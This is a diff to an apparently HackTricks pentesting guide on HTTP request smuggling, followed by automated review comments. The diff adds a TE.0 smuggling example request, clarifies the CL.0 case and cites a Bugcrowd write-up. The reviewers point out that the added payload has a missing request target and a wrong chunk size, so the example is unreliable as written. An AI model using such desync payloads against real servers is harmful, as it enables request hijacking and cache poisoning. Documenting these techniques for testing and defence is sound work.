diff --git a/pentesting-web/http-request-smuggling/README.md b/pentesting-web/http-request-smuggling/README.md index 44cf0c324..535f07ed6 100644 --- a/pentesting-web/http-request-smuggling/README.md +++ b/pentesting-web/http-request-smuggling/README.md @@ -1,8 +1,8 @@ # HTTP Request Smuggling / HTTP Desync Attack {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -60,6 +60,10 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex ![https://twitter.com/SpiderSec/status/1200413390339887104?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104\&ref\_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104](../../.gitbook/assets/EKi5edAUUAAIPIK.jpg) +{% hint style="info" %} +To the previous table you should add the TE.0 technique, like CL.0 technique but using Transfer Encoding. +{% endhint %} + #### CL.TE Vulnerability (Content-Length used by Front-End, Transfer-Encoding used by Back-End) * **Front-End (CL):** Processes the request based on the `Content-Length` header. @@ -137,7 +141,7 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex : chunked ``` -#### **CL.CL Scenario (Content-Length used by both Front-End and Back-End):** +#### **CL.CL Scenario (Content-Length used by both Front-End and Back-End)** * Both servers process the request based solely on the `Content-Length` header. * This scenario typically does not lead to smuggling, as there's alignment in how both servers interpret the request length. @@ -152,9 +156,9 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex Normal Request ``` -#### **CL != 0 Scenario:** +#### **CL.0 Scenario** -* Refers to scenarios where the `Content-Length` header is present and has a value other than zero, indicating that the request body has content. +* Refers to scenarios where the `Content-Length` header is present and has a value other than zero, indicating that the request body has content. The back-end ignores the `Content-Length` header (which is treated as 0), but the front-end parses it. * It's crucial in understanding and crafting smuggling attacks, as it influences how servers determine the end of a request. * **Example:** 
@@ -167,6 +171,30 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex Non-Empty Body ``` +#### TE.0 Scenario + +* Like the previous one but using TE +* Technique [reported here](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/) +* **Example**: + +``` +OPTIONS / HTTP/1.1 +Host: {HOST} +Accept-Encoding: gzip, deflate, br +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36 +Transfer-Encoding: chunked +Connection: keep-alive + +50 +GET HTTP/1.1 +x: X +0 +EMPTY_LINE_HERE +EMPTY_LINE_HERE +``` + #### Breaking the web server This technique is also useful in scenarios where it's possible to **break a web server while reading the initial HTTP data** but **without closing the connection**. This way, the **body** of the HTTP request will be considered the **next HTTP request**. 
@@ -550,7 +578,7 @@ X-Forwarded-For: xxx.xxx.xxx.xxx ``` An example on how to abuse this behaviour would be to **smuggle first a HEAD request**. This request will be responded with only the **headers** of a GET request (**`Content-Type`** among them). And smuggle **immediately after the HEAD a TRACE request**, which will be **reflecting the sent dat**a.\ -As the HEAD response will be containing a `Content-Length` header, the **response of the TRACE request will be treated as the body of the HEAD response, therefore reflecting arbitrary data** in the response. \ +As the HEAD response will be containing a `Content-Length` header, the **response of the TRACE request will be treated as the body of the HEAD response, therefore reflecting arbitrary data** in the response.\ This response will be sent to the next request over the connection, so this could be **used in a cached JS file for example to inject arbitrary JS code**. ### Abusing TRACE via HTTP Response Splitting 
@@ -735,10 +763,11 @@ def handleResponse(req, interesting): * [https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html](https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html) * [https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/](https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/) * [https://portswigger.net/research/trace-desync-attack](https://portswigger.net/research/trace-desync-attack) +* [https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
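Review bot: the first hunk (`@@ -1,8 +1,8 @@`) removes and re-adds the two "Learn & practice" hint lines with no visible difference, so the change is whitespace-only (most likely a trailing space or a non-breaking space around the `\` hard break). If that is intentional, say so in the commit message so reviewers do not hunt for a content change; otherwise drop this hunk and the identical one in the footer.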
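Review bot: the CL.0 description in the `@@ -60,6 +60,10 @@` hunk contradicts itself: the bullet first says the non-zero `Content-Length` "indicat[es] that the request body has content" and then says the back-end treats it as 0. State the two sides explicitly: the front-end honours the non-zero `Content-Length` and forwards the body, while the back-end ignores `Content-Length` (treating it as 0) and therefore parses that body as the start of the next request on the connection; that mismatch is what the technique relies on. The second bullet ("It's crucial in understanding...") was written for the old "CL != 0" heading and no longer adds anything; either remove it or fold it into the first. In the added info hint, write the header name as `Transfer-Encoding` rather than "Transfer Encoding", and note that the hint references CL.0 before the reader reaches the CL.0 section, so either move it below CL.0 or phrase it without the forward reference.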
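Review bot: the smuggled request line `GET HTTP/1.1` in the `@@ -167,6 +171,30 @@` hunk has no request-target, so it is not a valid HTTP/1.1 request line and a back-end would reject it instead of processing it; it looks like the target (a path or an absolute URL in angle brackets) was eaten by markdown. Restore it, e.g. `GET / HTTP/1.1`, and then recompute the chunk size: `50` is hexadecimal (80 bytes) while the visible chunk payload is roughly 25 bytes, so a front-end that honours `Transfer-Encoding: chunked` would keep waiting for the rest of the chunk rather than forward the request. The bullet "Like the previous one but using TE" should spell out the mechanics the way the CL.TE/TE.CL sections do: the front-end honours `Transfer-Encoding: chunked` and forwards the chunk body, the back-end ignores `Transfer-Encoding` and treats the request as bodiless, so the chunk contents become the next request. Finally, say that `EMPTY_LINE_HERE` stands for a bare CRLF (or just leave real blank lines inside the fence), since a reader copying the block literally will send those words.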
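Review bot: the `@@ -550,7 +578,7 @@` hunk only strips a trailing space before the `\` hard break, which is fine; while touching this paragraph, also fix the bold markup in the unchanged line just above it, `**reflecting the sent dat**a`, which closes the emphasis mid-word and renders "dat" bold and "a" plain. Move the closing `**` after `data`.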
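Review bot: in the `@@ -735,10 +763,11 @@` hunk the new Bugcrowd reference is the right citation for the added TE.0 section and matches the format of the surrounding entries. The footer hint lines are removed and re-added with no visible difference, the same whitespace-only churn as in the first hunk; either mention it in the commit message or leave those two lines untouched.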